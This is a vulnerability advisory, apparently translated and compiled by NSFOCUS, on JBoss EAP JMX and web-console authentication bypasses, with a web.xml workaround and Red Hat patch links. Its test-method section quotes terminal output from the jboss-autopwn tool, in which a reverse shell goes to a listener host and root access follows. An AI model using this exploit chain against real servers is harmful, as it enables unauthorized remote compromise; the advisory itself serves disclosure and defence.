JBoss Enterprise Application Platform Multiple Unauthorized Access Vulnerabilities

Release date: 2010-04-26
Updated: 2010-04-28

Affected systems:
RedHat JBoss EAP 4.3
RedHat JBoss EAP 4.2
Unaffected systems:
RedHat JBoss EAP 4.3.0.CP08
RedHat JBoss EAP 4.2.0.CP09
Description:
BUGTRAQ ID: 39710
CVE ID: CVE-2010-0738, CVE-2010-1428, CVE-2010-1429

JBoss Enterprise Application Platform (EAP) is a middleware platform for J2EE applications.

JBoss Enterprise Application Platform contains multiple unauthorized access vulnerabilities; a remote user can bypass authentication to perform unauthorized operations or read sensitive information.

1) The JMX console configuration specifies an authentication requirement only for requests that use the GET and POST HTTP methods. A remote attacker can craft an HTTP request that specifies neither GET nor POST, and the request is executed by the default GET handler without any authentication.

2) Unauthenticated access to the JBoss Application Server Web Console (/web-console) is blocked by default, but the block is incomplete: it covers only the GET and POST HTTP methods. A remote attacker can exploit this to access sensitive information.

3) The RHSA-2008:0828 update fixed a vulnerability that allowed unauthenticated users to access the status servlet (CVE-2008-3273); however, a bug fix in RHSA-2009:0349 reintroduced that vulnerability. A remote attacker can exploit this to obtain detailed information about the deployed web contexts.

<*Source: Giorgio Fedon
          Stefano Di Paola (stefano@dipaola.wisec.it)

  Links: http://secunia.com/advisories/39563/
         http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html
         https://www.redhat.com/support/errata/RHSA-2010-0379.html
         https://www.redhat.com/support/errata/RHSA-2010-0377.html
         https://www.redhat.com/support/errata/RHSA-2010-0376.html
         https://www.redhat.com/support/errata/RHSA-2010-0378.html
*>

Test method:

Warning

The following program (method) may be offensive in nature and is provided solely for security research and teaching purposes. Users assume all risk!

Chris said...
Got this working with JBoss-autopwn :-D

Screenshot below..

[root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080
[x] Checking if authentication is enabled..
[!] Authentication enabled!
[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass
[!] Is this a *nix based or Windows based JBoss instance? nix
[!] Which IP should I send the reverse shell to? 192.168.1.2
[!] Which port should I send the reverse shell to? 6669
[x] *nix based selected...
Connection from 192.168.1.3 port 6669 [tcp/*] accepted
[!] you should now have a shell on 192.168.1.2:6669
[root@foo jboss-autopwn]# fg 1
nc -lv 6669
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
^C
[root@foo jboss-autopwn]#

Recommendations:
Temporary workaround:

If you cannot install the patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* Modify the access configuration to block the other HTTP request methods.

Edit the web.xml file, located by default in the server/default/deploy/jmx-console.war/WEB-INF/ directory:

------------------------------- 8< -------------------------------
   <!-- A security constraint that restricts access to the HTML JMX console
   to users with the role JBossAdmin. Edit the roles to what you want and
   uncomment the WEB-INF/jboss-web.xml/security-domain element to enable
   secured access to the HTML JMX console.
   <security-constraint>
     <web-resource-collection>
       <web-resource-name>HtmlAdaptor</web-resource-name>
       <description>An example security config that only allows users with the
         role JBossAdmin to access the HTML JMX console web application
       </description>
       <url-pattern>/*</url-pattern>
       <http-method>GET</http-method>
       <http-method>POST</http-method>
       <http-method>HEAD</http-method>     <------- add this line
     </web-resource-collection>
     <auth-constraint>
       <role-name>JBossAdmin</role-name>
     </auth-constraint>
   </security-constraint>
   -->
------------------------------- 8< -------------------------------

Vendor patch:

RedHat
------
RedHat has released a security advisory (RHSA-2010:0376-01) and the corresponding patch:
RHSA-2010:0376-01: Critical: JBoss Enterprise Application Platform 4.2.0.CP09 update
Link: https://www.redhat.com/support/errata/RHSA-2010-0376.html

This vulnerability advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.